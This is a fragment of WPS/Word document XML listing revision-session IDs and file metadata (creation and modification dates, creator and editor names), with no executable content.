    <w:rsid w:val="2F914D18"/>
    <w:rsid w:val="2FA7273E"/>
    <w:rsid w:val="30702187"/>
    <w:rsid w:val="30F923F5"/>
    <w:rsid w:val="310A0D01"/>
    <w:rsid w:val="31397652"/>
    <w:rsid w:val="318409CB"/>
    <w:rsid w:val="32366270"/>
    <w:rsid w:val="32A66524"/>
    <w:rsid w:val="33915228"/>
    <w:rsid w:val="35C07A3B"/>
    <w:rsid w:val="36107446"/>
    <w:rsid w:val="3616624B"/>
    <w:rsid w:val="361840AC"/>
    <w:rsid w:val="36D65004"/>
    <w:rsid w:val="3717386F"/>
    <w:rsid w:val="37FC15BF"/>
    <w:rsid w:val="3A3A3CFF"/>
    <w:rsid w:val="3B5D137F"/>
    <w:rsid w:val="3C87592E"/>
    <w:rsid w:val="3E875CA5"/>
    <w:rsid w:val="3EA80270"/>
    <w:rsid w:val="3F3A5749"/>
    <w:rsid w:val="40306F5A"/>
    <w:rsid w:val="40DA00B5"/>
    <w:rsid w:val="44801C3A"/>
    <w:rsid w:val="44CE29A6"/>
    <w:rsid w:val="46693892"/>
    <w:rsid w:val="47E9088B"/>
    <w:rsid w:val="4A230728"/>
    <w:rsid w:val="4B7A7462"/>
    <w:rsid w:val="4C9E35A6"/>
    <w:rsid w:val="4DB8448E"/>
    <w:rsid w:val="4E4E5C86"/>
    <w:rsid w:val="4EB878B4"/>
    <w:rsid w:val="509748C6"/>
    <w:rsid w:val="50DE503B"/>
    <w:rsid w:val="51521776"/>
    <w:rsid w:val="51B24009"/>
    <w:rsid w:val="52497B10"/>
    <w:rsid w:val="53E60836"/>
    <w:rsid w:val="56A33BB2"/>
    <w:rsid w:val="57C70491"/>
    <w:rsid w:val="581E561D"/>
    <w:rsid w:val="590733FD"/>
    <w:rsid w:val="591304B3"/>
    <w:rsid w:val="5B721297"/>
    <w:rsid w:val="5C183C23"/>
    <w:rsid w:val="5FAE2505"/>
    <w:rsid w:val="5FBC509E"/>
    <w:rsid w:val="5FC6342F"/>
    <w:rsid w:val="606D4EC2"/>
    <w:rsid w:val="62716891"/>
    <w:rsid w:val="636A1027"/>
    <w:rsid w:val="638C4A5F"/>
    <w:rsid w:val="6425740B"/>
    <w:rsid w:val="646E2E54"/>
    <w:rsid w:val="658F67AE"/>
    <w:rsid w:val="65D12A9B"/>
    <w:rsid w:val="661528F6"/>
    <w:rsid w:val="67061813"/>
    <w:rsid w:val="6AA81989"/>
    <w:rsid w:val="6AC65D4A"/>
    <w:rsid w:val="6C2446F9"/>
    <w:rsid w:val="6EEC3FE5"/>
    <w:rsid w:val="6F993A2D"/>
    <w:rsid w:val="6FC36CFC"/>
    <w:rsid w:val="6FD85E0E"/>
    <w:rsid w:val="704D7FCB"/>
    <w:rsid w:val="70D511A9"/>
    <w:rsid w:val="713A21D2"/>
    <w:rsid w:val="734819F2"/>
    <w:rsid w:val="73E865B9"/>
    <w:rsid w:val="752A2448"/>
    <w:rsid w:val="75394C61"/>
    <w:rsid w:val="75C9324B"/>
    <w:rsid w:val="77985A45"/>
    <w:rsid w:val="77E2133C"/>
    <w:rsid w:val="78D863D1"/>
    <w:rsid w:val="7A31097F"/>
    <w:rsid w:val="7AB349DD"/>
    <w:rsid w:val="7B2D3022"/>
    <w:rsid w:val="7D0C0A6E"/>
    <w:rsid w:val="7D8D1888"/>
    <w:rsid w:val="7D925D0F"/>
    <w:rsid w:val="7E410432"/>
    <w:rsid w:val="7F196938"/>
    <w:rsid w:val="7F533BF8"/>
    <w:rsid w:val="7F58347D"/>
    <w:rsid w:val="7FF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2026-03-26T10:52:00Z</dcterms:created>
  <dc:creator>xxypg</dc:creator>
  <cp:lastModifiedBy>WPS_1694344073</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-01T09:52:07Z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F4770355696349708E15D182FA36EC8F</vt:lpwstr>
  </property>
</Properties>
</file>